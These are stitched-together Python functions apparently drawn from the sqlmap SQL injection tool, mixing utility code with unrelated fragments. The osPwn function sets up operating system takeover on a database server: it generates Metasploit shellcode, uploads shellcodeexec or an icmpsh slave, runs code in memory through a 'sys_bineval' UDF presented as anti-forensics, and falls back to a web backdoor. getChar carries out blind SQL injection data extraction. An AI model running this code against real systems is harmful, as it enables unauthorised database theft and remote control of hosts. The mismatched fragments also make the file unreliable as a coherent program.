"_mkstemp_inner" in excMsg: errMsg = "there has been a problem while accessing temporary files" logger.error(errMsg) raise SystemExit elif "can't start new thread" in excMsg: errMsg = "there has been a problem while creating new thread instance. " errMsg += "Please make sure that you are not running too many processes" if not IS_WIN: errMsg += " (or increase the 'ulimit -u' value)" logger.error(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("pymysql", "configparser")): errMsg = "wrong initialization of pymsql detected (using Python3 dependencies)" logger.error(errMsg) raise SystemExit elif "bad marshal data (unknown type code)" in excMsg: match = re.search(r"\s*(.+)\s+ValueError", excMsg) errMsg = "one of your .pyc files are corrupted%s" % (" ('%s')" % match.group(1) if match else "") errMsg += ". Please delete .pyc files on your system to fix the problem" logger.error(errMsg) raise SystemExit elif "valueStack.pop" in excMsg and kb.get("dumpKeyboardInterrupt"): raise SystemExit for match in re.finditer(r'File "(.+?)", line', excMsg): file_ = match.group(1) file_ = os.path.relpath(file_, os.path.dirname(__file__)) file_ = file_.replace("\\", '/') file_ = re.sub(r"\.\./", '/', file_).lstrip('/') excMsg = excMsg.replace(match.group(1), file_) errMsg = maskSensitiveData(errMsg) excMsg = maskSensitiveData(excMsg) if hasattr(conf, "api"): logger.critical("%s\n%s" % (errMsg, excMsg)) else: logger.critical(errMsg) kb.stickyLevel = logging.CRITICAL dataToStdout(excMsg) createGithubIssue(errMsg, excMsg) except KeyboardInterrupt: pass finally: kb.threadContinue = False if conf.get("showTime"): dataToStdout("\n[*] shutting down at %s\n\n" % time.strftime("%X"), forceOutput=True) kb.threadException = True if kb.get("tempDir"): for prefix in (MKSTEMP_PREFIX.IPC, MKSTEMP_PREFIX.TESTING, MKSTEMP_PREFIX.COOKIE_JAR, MKSTEMP_PREFIX.BIG_ARRAY): for filepath in glob.glob(os.path.join(kb.tempDir, "%s*" % prefix)): try: os.remove(filepath) except OSError: pass if not filter(None, (filepath for filepath in glob.glob(os.path.join(kb.tempDir, '*')) if not any(filepath.endswith(_) for _ in ('.lock', '.exe', '_')))): shutil.rmtree(kb.tempDir, ignore_errors=True) if conf.get("hashDB"): try: conf.hashDB.flush(True) except KeyboardInterrupt: pass if cmdLineOptions.get("sqlmapShell"): cmdLineOptions.clear() conf.clear() kb.clear() main() if hasattr(conf, "api"): try: conf.databaseCursor.disconnect() except KeyboardInterrupt: pass if conf.get("dumper"): conf.dumper.flush() # short delay for thread finalization try: _ = time.time() while threading.activeCount() > 1 and (time.time() - _) > THREAD_FINALIZATION_TIMEOUT: time.sleep(0.01) except KeyboardInterrupt: pass finally: # Reference: http://stackoverflow.com/questions/1635080/terminate-a-multi-thread-python-program if threading.activeCount() > 1: os._exit(0)
def read_file(self, filename, type='r'): if os.path.isfile(filename): with open(filename, type) as f: return f.readlines() logger.error("File is not exist: %s" % filename) return None
from lib.core.option import init from lib.core.profiling import profile from lib.core.settings import GIT_PAGE from lib.core.settings import IS_WIN from lib.core.settings import LEGAL_DISCLAIMER from lib.core.settings import THREAD_FINALIZATION_TIMEOUT from lib.core.settings import UNICODE_ENCODING from lib.core.settings import VERSION from lib.core.testing import smokeTest from lib.core.testing import liveTest from lib.parse.cmdline import cmdLineParser from lib.utils.api import setRestAPILog from lib.utils.api import StdDbOut except KeyboardInterrupt: errMsg = "user aborted" logger.error(errMsg) raise SystemExit def modulePath(): """ This will get us the program's directory, even if we are frozen using py2exe """ try: _ = sys.executable if weAreFrozen() else __file__ except NameError: _ = inspect.getsourcefile(modulePath) return getUnicode(os.path.dirname(os.path.realpath(_)), encoding=sys.getfilesystemencoding() or UNICODE_ENCODING)
def osPwn(self): goUdf = False fallbackToWeb = False setupSuccess = False self.checkDbmsOs() if Backend.isOs(OS.WINDOWS): msg = "how do you want to establish the tunnel?" msg += "\n[1] TCP: Metasploit Framework (default)" msg += "\n[2] ICMP: icmpsh - ICMP tunneling" valids = (1, 2) while True: tunnel = readInput(msg, default=1) if isinstance(tunnel, basestring) and tunnel.isdigit() and int( tunnel) in valids: tunnel = int(tunnel) break elif isinstance(tunnel, int) and tunnel in valids: break else: warnMsg = "invalid value, valid values are 1 and 2" logger.warn(warnMsg) else: tunnel = 1 debugMsg = "the tunnel can be established only via TCP when " debugMsg += "the back-end DBMS is not Windows" logger.debug(debugMsg) if tunnel == 2: isAdmin = runningAsAdmin() if not isAdmin: errMsg = "you need to run sqlmap as an administrator " errMsg += "if you want to establish an out-of-band ICMP " errMsg += "tunnel because icmpsh uses raw sockets to " errMsg += "sniff and craft ICMP packets" raise SqlmapMissingPrivileges(errMsg) try: from impacket import ImpactDecoder from impacket import ImpactPacket except ImportError: errMsg = "sqlmap requires 'python-impacket' third-party library " errMsg += "in order to run icmpsh master. You can get it at " errMsg += "http://code.google.com/p/impacket/downloads/list" raise SqlmapMissingDependence(errMsg) sysIgnoreIcmp = "/proc/sys/net/ipv4/icmp_echo_ignore_all" if os.path.exists(sysIgnoreIcmp): fp = open(sysIgnoreIcmp, "wb") fp.write("1") fp.close() else: errMsg = "you need to disable ICMP replies by your machine " errMsg += "system-wide. For example run on Linux/Unix:\n" errMsg += "# sysctl -w net.ipv4.icmp_echo_ignore_all=1\n" errMsg += "If you miss doing that, you will receive " errMsg += "information from the database server and it " errMsg += "is unlikely to receive commands sent from you" logger.error(errMsg) if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): self.sysUdfs.pop("sys_bineval") self.getRemoteTempPath() if isStackingAvailable() or conf.direct: web = False self.initEnv(web=web) if tunnel == 1: if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): msg = "how do you want to execute the Metasploit shellcode " msg += "on the back-end database underlying operating system?" msg += "\n[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)" msg += "\n[2] Via shellcodeexec (file system way, preferred on 64-bit systems)" while True: choice = readInput(msg, default=1) if isinstance(choice, basestring) and choice.isdigit( ) and int(choice) in (1, 2): choice = int(choice) break elif isinstance(choice, int) and choice in (1, 2): break else: warnMsg = "invalid value, valid values are 1 and 2" logger.warn(warnMsg) if choice == 1: goUdf = True if goUdf: exitfunc = "thread" setupSuccess = True else: exitfunc = "process" self.createMsfShellcode(exitfunc=exitfunc, format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed") if not goUdf: setupSuccess = self.uploadShellcodeexec(web=web) if setupSuccess is not True: if Backend.isDbms(DBMS.MYSQL): fallbackToWeb = True else: msg = "unable to mount the operating system takeover" raise SqlmapFilePathException(msg) if Backend.isOs(OS.WINDOWS) and Backend.isDbms( DBMS.MYSQL) and conf.privEsc: debugMsg = "by default MySQL on Windows runs as SYSTEM " debugMsg += "user, no need to privilege escalate" logger.debug(debugMsg) elif tunnel == 2: setupSuccess = self.uploadIcmpshSlave(web=web) if setupSuccess is not True: if Backend.isDbms(DBMS.MYSQL): fallbackToWeb = True else: msg = "unable to mount the operating system takeover" raise SqlmapFilePathException(msg) if not setupSuccess and Backend.isDbms( DBMS.MYSQL) and not conf.direct and (not isStackingAvailable() or fallbackToWeb): web = True if fallbackToWeb: infoMsg = "falling back to web backdoor to establish the tunnel" else: infoMsg = "going to use a web backdoor to establish the tunnel" logger.info(infoMsg) self.initEnv(web=web, forceInit=fallbackToWeb) if self.webBackdoorUrl: if not Backend.isOs(OS.WINDOWS) and conf.privEsc: # Unset --priv-esc if the back-end DBMS underlying operating # system is not Windows conf.privEsc = False warnMsg = "sqlmap does not implement any operating system " warnMsg += "user privilege escalation technique when the " warnMsg += "back-end DBMS underlying system is not Windows" logger.warn(warnMsg) if tunnel == 1: self.createMsfShellcode(exitfunc="process", format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed") setupSuccess = self.uploadShellcodeexec(web=web) if setupSuccess is not True: msg = "unable to mount the operating system takeover" raise SqlmapFilePathException(msg) elif tunnel == 2: setupSuccess = self.uploadIcmpshSlave(web=web) if setupSuccess is not True: msg = "unable to mount the operating system takeover" raise SqlmapFilePathException(msg) if setupSuccess: if tunnel == 1: self.pwn(goUdf) elif tunnel == 2: self.icmpPwn() else: errMsg = "unable to prompt for an out-of-band session" raise SqlmapNotVulnerableException(errMsg) if not conf.cleanup: self.cleanup(web=web)
def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardException=True, threadChoice=False, startThreadMsg=True): threads = [] kb.threadContinue = True kb.threadException = False if threadChoice and numThreads == 1 and not (kb.injection.data and not any(_ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in kb.injection.data)): while True: message = "please enter number of threads? [Enter for %d (current)] " % numThreads choice = readInput(message, default=str(numThreads)) if choice: skipThreadCheck = False if choice.endswith('!'): choice = choice[:-1] skipThreadCheck = True if choice.isdigit(): if int(choice) > MAX_NUMBER_OF_THREADS and not skipThreadCheck: errMsg = "maximum number of used threads is %d avoiding potential connection issues" % MAX_NUMBER_OF_THREADS logger.critical(errMsg) else: conf.threads = numThreads = int(choice) break if numThreads == 1: warnMsg = "running in a single-thread mode. This could take a while" logger.warn(warnMsg) try: if numThreads > 1: if startThreadMsg: infoMsg = "starting %d threads" % numThreads logger.info(infoMsg) else: threadFunction() return # Start the threads for numThread in xrange(numThreads): thread = threading.Thread(target=exceptionHandledFunction, name=str(numThread), args=[threadFunction]) setDaemon(thread) try: thread.start() except Exception as ex: errMsg = "error occurred while starting new thread ('%s')" % ex.message logger.critical(errMsg) break threads.append(thread) # And wait for them to all finish alive = True while alive: alive = False for thread in threads: if thread.isAlive(): alive = True time.sleep(0.1) except (KeyboardInterrupt, SqlmapUserQuitException) as ex: print() kb.prependFlag = False kb.threadContinue = False kb.threadException = True if numThreads > 1: logger.info("waiting for threads to finish%s" % (" (Ctrl+C was pressed)" if isinstance(ex, KeyboardInterrupt) else "")) try: while (threading.activeCount() > 1): pass except KeyboardInterrupt: raise SqlmapThreadException("user aborted (Ctrl+C was pressed multiple times)") if forwardException: raise except (SqlmapConnectionException, SqlmapValueException) as ex: print() kb.threadException = True logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message)) if conf.get("verbose") > 1: traceback.print_exc() except: from lib.core.common import unhandledExceptionMessage print() kb.threadException = True errMsg = unhandledExceptionMessage() logger.error("thread %s: %s" % (threading.currentThread().getName(), errMsg)) traceback.print_exc() finally: kb.bruteMode = False kb.threadContinue = True kb.threadException = False for lock in kb.locks.values(): if lock.locked(): try: lock.release() except: pass if conf.get("hashDB"): conf.hashDB.flush(True) if cleanupFunction: cleanupFunction()
def getChar(idx, charTbl=None, continuousOrder=True, expand=charsetType is None, shiftTable=None, retried=None): """ continuousOrder means that distance between each two neighbour's numerical values is exactly 1 """ result = tryHint(idx) if result: return result if charTbl is None: charTbl = type(asciiTbl)(asciiTbl) originalTbl = type(charTbl)(charTbl) if continuousOrder and shiftTable is None: # Used for gradual expanding into unicode charspace shiftTable = [2, 2, 3, 3, 5, 4] if "'%s'" % CHAR_INFERENCE_MARK in payload: for char in ('\n', '\r'): if ord(char) in charTbl: charTbl.remove(ord(char)) if not charTbl: return None elif len(charTbl) == 1: forgedPayload = safeStringFormat( payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, charTbl[0])) result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) incrementCounter(kb.technique) if result: return decodeIntToUnicode(charTbl[0]) else: return None maxChar = maxValue = charTbl[-1] minValue = charTbl[0] firstCheck = False lastCheck = False unexpectedCode = False if continuousOrder: while len(charTbl) > 1: position = None if charsetType is None: if not firstCheck: try: try: lastChar = [ _ for _ in threadData.shared.value if _ is not None ][-1] except IndexError: lastChar = None else: if 'a' <= lastChar <= 'z': position = charTbl.index(ord('a') - 1) # 96 elif 'A' <= lastChar <= 'Z': position = charTbl.index(ord('A') - 1) # 64 elif '0' <= lastChar <= '9': position = charTbl.index(ord('0') - 1) # 47 except ValueError: pass finally: firstCheck = True elif not lastCheck and numThreads == 1: # not usable in multi-threading environment if charTbl[(len(charTbl) >> 1)] < ord(' '): try: # favorize last char check if current value inclines toward 0 position = charTbl.index(1) except ValueError: pass finally: lastCheck = True if position is None: position = (len(charTbl) >> 1) posValue = charTbl[position] falsePayload = None if "'%s'" % CHAR_INFERENCE_MARK not in payload: forgedPayload = safeStringFormat( payload, (expressionUnescaped, idx, posValue)) falsePayload = safeStringFormat( payload, (expressionUnescaped, idx, RANDOM_INTEGER_MARKER)) else: # e.g.: ... > '%c' -> ... > ORD(..) markingValue = "'%s'" % CHAR_INFERENCE_MARK unescapedCharValue = unescaper.escape( "'%s'" % decodeIntToUnicode(posValue)) forgedPayload = safeStringFormat( payload, (expressionUnescaped, idx)).replace( markingValue, unescapedCharValue) falsePayload = safeStringFormat( payload, (expressionUnescaped, idx)).replace( markingValue, NULL) if timeBasedCompare: if kb.responseTimeMode: kb.responseTimePayload = falsePayload else: kb.responseTimePayload = None result = Request.queryPage( forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) incrementCounter(kb.technique) if not timeBasedCompare: unexpectedCode |= threadData.lastCode not in ( kb.injection.data[kb.technique].falseCode, kb.injection.data[kb.technique].trueCode) if unexpectedCode: warnMsg = "unexpected HTTP code '%s' detected. Will use (extra) validation step in similar cases" % threadData.lastCode singleTimeWarnMessage(warnMsg) if result: minValue = posValue if not isinstance(charTbl, xrange): charTbl = charTbl[position:] else: # xrange() - extended virtual charset used for memory/space optimization charTbl = xrange(charTbl[position], charTbl[-1] + 1) else: maxValue = posValue if not isinstance(charTbl, xrange): charTbl = charTbl[:position] else: charTbl = xrange(charTbl[0], charTbl[position]) if len(charTbl) == 1: if maxValue == 1: return None # Going beyond the original charset elif minValue == maxChar: # If the original charTbl was [0,..,127] new one # will be [128,..,(128 << 4) - 1] or from 128 to 2047 # and instead of making a HUGE list with all the # elements we use a xrange, which is a virtual # list if expand and shiftTable: charTbl = xrange( maxChar + 1, (maxChar + 1) << shiftTable.pop()) originalTbl = xrange(charTbl) maxChar = maxValue = charTbl[-1] minValue = charTbl[0] else: return None else: retVal = minValue + 1 if retVal in originalTbl or ( retVal == ord('\n') and CHAR_INFERENCE_MARK in payload): if (timeBasedCompare or unexpectedCode ) and not validateChar(idx, retVal): if not kb.originalTimeDelay: kb.originalTimeDelay = conf.timeSec threadData.validationRun = 0 if (retried or 0) < MAX_REVALIDATION_STEPS: errMsg = "invalid character detected. retrying.." logger.error(errMsg) if timeBasedCompare: if kb.adjustTimeDelay is not ADJUST_TIME_DELAY.DISABLE: conf.timeSec += 1 warnMsg = "increasing time delay to %d second%s" % ( conf.timeSec, 's' if conf.timeSec > 1 else '') logger.warn(warnMsg) if kb.adjustTimeDelay is ADJUST_TIME_DELAY.YES: dbgMsg = "turning off time auto-adjustment mechanism" logger.debug(dbgMsg) kb.adjustTimeDelay = ADJUST_TIME_DELAY.NO return getChar(idx, originalTbl, continuousOrder, expand, shiftTable, (retried or 0) + 1) else: errMsg = "unable to properly validate last character value ('%s').." % decodeIntToUnicode( retVal) logger.error(errMsg) conf.timeSec = kb.originalTimeDelay return decodeIntToUnicode(retVal) else: if timeBasedCompare: threadData.validationRun += 1 if kb.adjustTimeDelay is ADJUST_TIME_DELAY.NO and threadData.validationRun > VALID_TIME_CHARS_RUN_THRESHOLD: dbgMsg = "turning back on time auto-adjustment mechanism" logger.debug(dbgMsg) kb.adjustTimeDelay = ADJUST_TIME_DELAY.YES return decodeIntToUnicode(retVal) else: return None else: candidates = list(originalTbl) bit = 0 while len(candidates) > 1: bits = {} for candidate in candidates: bit = 0 while candidate: bits.setdefault(bit, 0) bits[bit] += 1 if candidate & 1 else -1 candidate >>= 1 bit += 1 choice = sorted(bits.items(), key=lambda _: abs(_[1]))[0][0] mask = 1 << choice forgedPayload = safeStringFormat( payload.replace( INFERENCE_GREATER_CHAR, "&%d%s" % (mask, INFERENCE_GREATER_CHAR)), (expressionUnescaped, idx, 0)) result = Request.queryPage( forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) incrementCounter(kb.technique) if result: candidates = [_ for _ in candidates if _ & mask > 0] else: candidates = [_ for _ in candidates if _ & mask == 0] bit += 1 if candidates: forgedPayload = safeStringFormat( payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, candidates[0])) result = Request.queryPage( forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) incrementCounter(kb.technique) if result: return decodeIntToUnicode(candidates[0])
def client(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, username=None, password=None): """ REST-JSON API client """ DataStore.username = username DataStore.password = password dbgMsg = "Example client access from command line:" dbgMsg += "\n\t$ taskid=$(curl http://%s:%d/task/new 2>1 | grep -o -I '[a-f0-9]\\{16\\}') && echo $taskid" % (host, port) dbgMsg += "\n\t$ curl -H \"Content-Type: application/json\" -X POST -d '{\"url\": \"http://testphp.vulnweb.com/artists.php?artist=1\"}' http://%s:%d/scan/$taskid/start" % (host, port) dbgMsg += "\n\t$ curl http://%s:%d/scan/$taskid/data" % (host, port) dbgMsg += "\n\t$ curl http://%s:%d/scan/$taskid/log" % (host, port) logger.debug(dbgMsg) addr = "http://%s:%d" % (host, port) logger.info("Starting REST-JSON API client to '%s'..." % addr) try: _client(addr) except Exception as ex: if not isinstance(ex, _urllib.error.HTTPError) or ex.code == _http_client.UNAUTHORIZED: errMsg = "There has been a problem while connecting to the " errMsg += "REST-JSON API server at '%s' " % addr errMsg += "(%s)" % ex logger.critical(errMsg) return commands = ("help", "new", "use", "data", "log", "status", "option", "stop", "kill", "list", "flush", "exit", "bye", "quit") autoCompletion(AUTOCOMPLETE_TYPE.API, commands=commands) taskid = None logger.info("Type 'help' or '?' for list of available commands") while True: try: command = _input("api%s> " % (" (%s)" % taskid if taskid else "")).strip() command = re.sub(r"\A(\w+)", lambda match: match.group(1).lower(), command) except (EOFError, KeyboardInterrupt): print() break if command in ("data", "log", "status", "stop", "kill"): if not taskid: logger.error("No task ID in use") continue raw = _client("%s/scan/%s/%s" % (addr, taskid, command)) res = dejsonize(raw) if not res["success"]: logger.error("Failed to execute command %s" % command) dataToStdout("%s\n" % raw) elif command.startswith("option"): if not taskid: logger.error("No task ID in use") continue try: command, option = command.split(" ", 1) except ValueError: raw = _client("%s/option/%s/list" % (addr, taskid)) else: options = re.split(r"\s*,\s*", option.strip()) raw = _client("%s/option/%s/get" % (addr, taskid), options) res = dejsonize(raw) if not res["success"]: logger.error("Failed to execute command %s" % command) dataToStdout("%s\n" % raw) elif command.startswith("new"): if ' ' not in command: logger.error("Program arguments are missing") continue try: argv = ["sqlmap.py"] + shlex.split(command)[1:] except Exception as ex: logger.error("Error occurred while parsing arguments ('%s')" % ex) taskid = None continue try: cmdLineOptions = cmdLineParser(argv).__dict__ except: taskid = None continue for key in list(cmdLineOptions): if cmdLineOptions[key] is None: del cmdLineOptions[key] raw = _client("%s/task/new" % addr) res = dejsonize(raw) if not res["success"]: logger.error("Failed to create new task") continue taskid = res["taskid"] logger.info("New task ID is '%s'" % taskid) raw = _client("%s/scan/%s/start" % (addr, taskid), cmdLineOptions) res = dejsonize(raw) if not res["success"]: logger.error("Failed to start scan") continue logger.info("Scanning started") elif command.startswith("use"): taskid = (command.split()[1] if ' ' in command else "").strip("'\"") if not taskid: logger.error("Task ID is missing") taskid = None continue elif not re.search(r"\A[0-9a-fA-F]{16}\Z", taskid): logger.error("Invalid task ID '%s'" % taskid) taskid = None continue logger.info("Switching to task ID '%s' " % taskid) elif command in ("list", "flush"): raw = _client("%s/admin/%s" % (addr, command)) res = dejsonize(raw) if not res["success"]: logger.error("Failed to execute command %s" % command) elif command == "flush": taskid = None dataToStdout("%s\n" % raw) elif command in ("exit", "bye", "quit", 'q'): return elif command in ("help", "?"): msg = "help Show this help message\n" msg += "new ARGS Start a new scan task with provided arguments (e.g. 'new -u \"http://testphp.vulnweb.com/artists.php?artist=1\"')\n" msg += "use TASKID Switch current context to different task (e.g. 'use c04d8c5c7582efb4')\n" msg += "data Retrieve and show data for current task\n" msg += "log Retrieve and show log for current task\n" msg += "status Retrieve and show status for current task\n" msg += "option OPTION Retrieve and show option for current task\n" msg += "options Retrieve and show all options for current task\n" msg += "stop Stop current task\n" msg += "kill Kill current task\n" msg += "list Display all tasks\n" msg += "flush Flush tasks (delete all tasks)\n" msg += "exit Exit this client\n" dataToStdout(msg) elif command: logger.error("Unknown command '%s'" % command)
def __file(): if not os.path.isfile(input_file): msg = 'TargetFile not found: %s' % input_file sys.exit(logger.error(msg)) conf.TARGET_MODE = TARGET_MODE_STATUS.FILE conf.INPUT_FILE_PATH = input_file
def update(): if not conf.updateAll: return success = False if not os.path.exists(os.path.join(paths.SQLMAP_ROOT_PATH, ".git")): warnMsg = "not a git repository. It is recommended to clone the 'sqlmapproject/sqlmap' repository " warnMsg += "from GitHub (e.g. 'git clone --depth 1 %s sqlmap')" % GIT_REPOSITORY logger.warn(warnMsg) if VERSION == getLatestRevision(): logger.info("already at the latest revision '%s'" % getRevisionNumber()) return message = "do you want to try to fetch the latest 'zipball' from repository and extract it (experimental) ? [y/N]" if readInput(message, default='N', boolean=True): directory = os.path.abspath(paths.SQLMAP_ROOT_PATH) try: open(os.path.join(directory, "sqlmap.py"), "w+b") except Exception as ex: errMsg = "unable to update content of directory '%s' ('%s')" % ( directory, getSafeExString(ex)) logger.error(errMsg) else: attrs = os.stat(os.path.join(directory, "sqlmap.py")).st_mode for wildcard in ('*', ".*"): for _ in glob.glob(os.path.join(directory, wildcard)): try: if os.path.isdir(_): shutil.rmtree(_) else: os.remove(_) except: pass if glob.glob(os.path.join(directory, '*')): errMsg = "unable to clear the content of directory '%s'" % directory logger.error(errMsg) else: try: archive = _urllib.request.urlretrieve(ZIPBALL_PAGE)[0] with zipfile.ZipFile(archive) as f: for info in f.infolist(): info.filename = re.sub(r"\Asqlmap[^/]+", "", info.filename) if info.filename: f.extract(info, directory) filepath = os.path.join(paths.SQLMAP_ROOT_PATH, "lib", "core", "settings.py") if os.path.isfile(filepath): with openFile(filepath, "rb") as f: version = re.search( r"(?m)^VERSION\s*=\s*['\"]([^'\"]+)", f.read()).group(1) logger.info( "updated to the latest version '%s#dev'" % version) success = True except Exception as ex: logger.error("update could not be completed ('%s')" % getSafeExString(ex)) else: if not success: logger.error("update could not be completed") else: try: os.chmod(os.path.join(directory, "sqlmap.py"), attrs) except OSError: logger.warning( "could not set the file attributes of '%s'" % os.path.join(directory, "sqlmap.py")) else: infoMsg = "updating sqlmap to the latest development revision from the " infoMsg += "GitHub repository" logger.info(infoMsg) debugMsg = "sqlmap will try to update itself using 'git' command" logger.debug(debugMsg) dataToStdout("\r[%s] [INFO] update in progress" % time.strftime("%X")) try: process = subprocess.Popen("git checkout . && git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, cwd=paths.SQLMAP_ROOT_PATH) pollProcess(process, True) output, _ = process.communicate() success = not process.returncode except Exception as ex: success = False output = getSafeExString(ex) finally: output = getText(output) if success: logger.info("%s the latest revision '%s'" % ("already at" if "Already" in output else "updated to", getRevisionNumber())) else: if "Not a git repository" in output: errMsg = "not a valid git repository. Please checkout the 'sqlmapproject/sqlmap' repository " errMsg += "from GitHub (e.g. 'git clone --depth 1 %s sqlmap')" % GIT_REPOSITORY logger.error(errMsg) else: logger.error("update could not be completed ('%s')" % re.sub(r"\W+", " ", output).strip()) if not success: if IS_WIN: infoMsg = "for Windows platform it's recommended " infoMsg += "to use a GitHub for Windows client for updating " infoMsg += "purposes (http://windows.github.com/) or just " infoMsg += "download the latest snapshot from " infoMsg += "https://github.com/sqlmapproject/sqlmap/downloads" else: infoMsg = "for Linux platform it's recommended " infoMsg += "to install a standard 'git' package (e.g.: 'sudo apt-get install git')" logger.info(infoMsg)